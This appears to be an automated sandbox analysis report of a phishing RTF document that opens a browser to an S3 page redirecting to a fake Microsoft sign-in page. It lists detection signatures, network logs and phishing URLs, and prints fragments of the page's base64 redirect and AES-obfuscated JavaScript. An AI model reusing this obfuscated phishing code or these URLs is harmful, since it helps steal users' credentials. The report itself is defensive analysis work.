Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Iamgold-PYMPATA Policy_Enrollment2024739441.rtf

Overview

General Information

Sample name:Iamgold-PYMPATA Policy_Enrollment2024739441.rtf
Analysis ID:1556628
MD5:03cd3dab4456ae5017e9bf714a1e572a
SHA1:3d6df7276f2b01204e0ce523353bdc131e73ac3f
SHA256:0eba1169393c80b84b1a49a38e88fd9ab0ccd1c99e0f7249d77eddbd2f32a351
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
HTML page contains suspicious javascript code
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
HTML body contains low number of good links
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Javascript checks online IP of machine
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64_ra
  • WINWORD.EXE (PID: 6940 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\Iamgold-PYMPATA Policy_Enrollment2024739441.rtf" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  • chrome.exe (PID: 6672 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s3.eu-west-1.amazonaws.com/patnla.chivivemie/mandlas%23%2377374%23etikos3438%2324737%23madbviewmine%23%26%23%26%23portca3737%237347739%23737373%2334773%2383838%23.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2032,i,2302002758345039556,8558399744438251338,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-15T18:09:05.064151+010028286562Possible Social Engineering Attempted91.211.222.250443192.168.2.1662646TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://s3.eu-west-1.amazonaws.com/patnla.chivivemie/mandlas%23%2377374%23etikos3438%2324737%23madbviewmine%23%26%23%26%23portca3737%237347739%23737373%2334773%2383838%23.htmlSlashNext: Label: Credential Stealing type: Phishing & Social Engineering

Phishing

barindex
Source: https://gambol.smarthost.pl/amdhcrviewpmt/Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is a well-known global technology company., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'gambol.smarthost.pl' does not match the legitimate domain for Microsoft., The URL uses a different domain 'smarthost.pl', which is not associated with Microsoft., The presence of input fields for 'Email, phone, or Skype' is typical for Microsoft services, but the domain mismatch is suspicious. DOM: 2.5.pages.csv
Source: https://s3.eu-west-1.amazonaws.com/patnla.chivivemie/mandlas%23%2377374%23etikos3438%2324737%23madbviewmine%23%26%23%26%23portca3737%237347739%23737373%2334773%2383838%23.htmlHTTP Parser: window.location.href = atob(
Source: https://gambol.smarthost.pl/amdhcrviewpmt/HTTP Parser: window.location.href = atob(
Source: https://gambol.smarthost.pl/amdhcrviewpmt/HTTP Parser: Number of links: 0
Source: https://gambol.smarthost.pl/amdhcrviewpmt/HTTP Parser: Total embedded image size: 45708
Source: https://s3.eu-west-1.amazonaws.com/patnla.chivivemie/mandlas%23%2377374%23etikos3438%2324737%23madbviewmine%23%26%23%26%23portca3737%237347739%23737373%2334773%2383838%23.htmlHTTP Parser: Base64 decoded: https://gambol.smarthost.pl/amdhcrviewpmt
Source: https://gambol.smarthost.pl/amdhcrviewpmt/HTTP Parser: Title: Account sign in does not match URL
Source: https://gambol.smarthost.pl/amdhcrviewpmt/HTTP Parser: let current_ip = null;function pzr79jhgq(plaintext, key) { const keysize = [16, 24, 32]; if (!keysize.includes(key.length)) { throw new error("incorrect aes key length. use a 16, 24, or 32 bytes key."); } // generate a random iv (initialization vector) const iv = cryptojs.lib.wordarray.random(16); // encrypt the plain text using aes with the given key and random iv const encrypted = cryptojs.aes.encrypt(cryptojs.enc.utf8.parse(plaintext), cryptojs.enc.utf8.parse(key), { iv: iv, mode: cryptojs.mode.cbc, padding: cryptojs.pad.pkcs7 }); // combine the iv and ciphertext (iv is necessary for decryption) const encrypteddata = iv.concat(encrypted.ciphertext); // convert the combined data to base64 for easy transmission or storage return cryptojs.enc.base64.stringify(encrypteddata);}let psk = "tkmfegrwkpckcq7hmgj2ab6fkpq+wd3ju5k4ektobb5socm8yosjwgf/qhrdip3pd/0luvdy3vyallb42ur+1q==";async function rp4lwx() { try { const response = await fetch("ht...
Source: https://gambol.smarthost.pl/amdhcrviewpmt/HTTP Parser: let usuuid = "tkmfegrwkpckcq7hmgj2ab6fkpq+wd3ju5k4ektobb5socm8yosjwgf/qhrdip3pd/0luvdy3vyallb42ur+1q=="; let policy = "pxmvmec2r2ugrndvjdt/6gp5msx1bwn4czrd0lm5xy9mvsoya3rymff+cnjdqdxc";let sv = "0"; let sir = "0"; function decstr(encryptedstring, key) { const keysize = [16, 24, 32]; if (!keysize.includes(key.length)) { throw new error("incorrect aes key length. use a 16, 24, or 32 bytes key."); } const encrypteddata = cryptojs.enc.base64.parse(encryptedstring); const iv = cryptojs.lib.wordarray.create(encrypteddata.words.slice(0, 4)); const ciphertext = cryptojs.lib.wordarray.create( encrypteddata.words.slice(4) ); const decrypteddata = cryptojs.aes.decrypt( { ciphertext: ciphertext, }, cryptojs.enc.utf8.par...
Source: https://s3.eu-west-1.amazonaws.com/patnla.chivivemie/mandlas%23%2377374%23etikos3438%2324737%23madbviewmine%23%26%23%26%23portca3737%237347739%23737373%2334773%2383838%23.htmlHTTP Parser: No favicon
Source: https://gambol.smarthost.pl/amdhcrviewpmt/HTTP Parser: No favicon
Source: https://gambol.smarthost.pl/amdhcrviewpmt/HTTP Parser: No favicon
Source: https://gambol.smarthost.pl/amdhcrviewpmt/HTTP Parser: No favicon
Source: https://gambol.smarthost.pl/amdhcrviewpmt/HTTP Parser: No favicon
Source: https://gambol.smarthost.pl/amdhcrviewpmt/HTTP Parser: No <meta name="author".. found
Source: https://gambol.smarthost.pl/amdhcrviewpmt/HTTP Parser: No <meta name="copyright".. found
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6672_1729790489\LICENSE.txtJump to behavior
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:62658 version: TLS 1.2
Source: winword.exeMemory has grown: Private usage: 4MB later: 87MB
Source: global trafficTCP traffic: 192.168.2.16:62573 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:53770 -> 1.1.1.1:53
Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 147.79.74.176 147.79.74.176
Source: Joe Sandbox ViewASN Name: TRUSTNET-PL-ASPL TRUSTNET-PL-ASPL
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Network trafficSuricata IDS: 2828656 - Severity 2 - ETPRO PHISHING Microsoft Live Account Verification Phishing Landing Nov 20 2017 : 91.211.222.250:443 -> 192.168.2.16:62646
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.134
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: global trafficHTTP traffic detected: GET /patnla.chivivemie/mandlas%23%2377374%23etikos3438%2324737%23madbviewmine%23%26%23%26%23portca3737%237347739%23737373%2334773%2383838%23.html HTTP/1.1Host: s3.eu-west-1.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: s3.eu-west-1.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://s3.eu-west-1.amazonaws.com/patnla.chivivemie/mandlas%23%2377374%23etikos3438%2324737%23madbviewmine%23%26%23%26%23portca3737%237347739%23737373%2334773%2383838%23.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=f2cH6mg7mwxXTxP&MD=9XaRWou8 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /amdhcrviewpmt HTTP/1.1Host: gambol.smarthost.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://s3.eu-west-1.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /amdhcrviewpmt/ HTTP/1.1Host: gambol.smarthost.plConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://s3.eu-west-1.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gambol.smarthost.pl/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gambol.smarthost.pl/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/662em/0x4AAAAAAA0CO9LzmGdRnkcZ/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://gambol.smarthost.pl/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e30d87ec8a16c3f&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/662em/0x4AAAAAAA0CO9LzmGdRnkcZ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/662em/0x4AAAAAAA0CO9LzmGdRnkcZ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e30d87ec8a16c3f&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: gambol.smarthost.plConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gambol.smarthost.pl/amdhcrviewpmt/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4e927ff4cd1f8500dee1e5063e16de2e; cookie_test=test; js_enabled=true
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1093189025:1731688839:x1kRv33ivkzJcCIS_vRAZkT6bqP_ctXOxZXsKsV2PSM/8e30d87ec8a16c3f/sSzRqdTgFUcq5RjMOQYSTAVuj6rBGacRDng0LKDFlh0-1731690531-1.1.1.1-0TLD7tDIxT0D0EQK8__TG0ore5iDxu0qcQttWVAtka.Bgsl__SU0L0riobFnqkzZ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8e30d87ec8a16c3f/1731690534483/YsSzfqJgTmO8M-E HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/662em/0x4AAAAAAA0CO9LzmGdRnkcZ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8e30d87ec8a16c3f/1731690534483/YsSzfqJgTmO8M-E HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8e30d87ec8a16c3f/1731690534487/5c0d70b800e056611086d4f5f24c9950452decee7f463be7f314e1558386e50c/qYoTKdafX5udHN4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/662em/0x4AAAAAAA0CO9LzmGdRnkcZ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1093189025:1731688839:x1kRv33ivkzJcCIS_vRAZkT6bqP_ctXOxZXsKsV2PSM/8e30d87ec8a16c3f/sSzRqdTgFUcq5RjMOQYSTAVuj6rBGacRDng0LKDFlh0-1731690531-1.1.1.1-0TLD7tDIxT0D0EQK8__TG0ore5iDxu0qcQttWVAtka.Bgsl__SU0L0riobFnqkzZ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1093189025:1731688839:x1kRv33ivkzJcCIS_vRAZkT6bqP_ctXOxZXsKsV2PSM/8e30d87ec8a16c3f/sSzRqdTgFUcq5RjMOQYSTAVuj6rBGacRDng0LKDFlh0-1731690531-1.1.1.1-0TLD7tDIxT0D0EQK8__TG0ore5iDxu0qcQttWVAtka.Bgsl__SU0L0riobFnqkzZ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /amdhcrviewpmt/ HTTP/1.1Host: gambol.smarthost.plConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://gambol.smarthost.pl/amdhcrviewpmt/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4e927ff4cd1f8500dee1e5063e16de2e; cookie_test=test; js_enabled=true
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gambol.smarthost.pl/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gambol.smarthost.pl/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
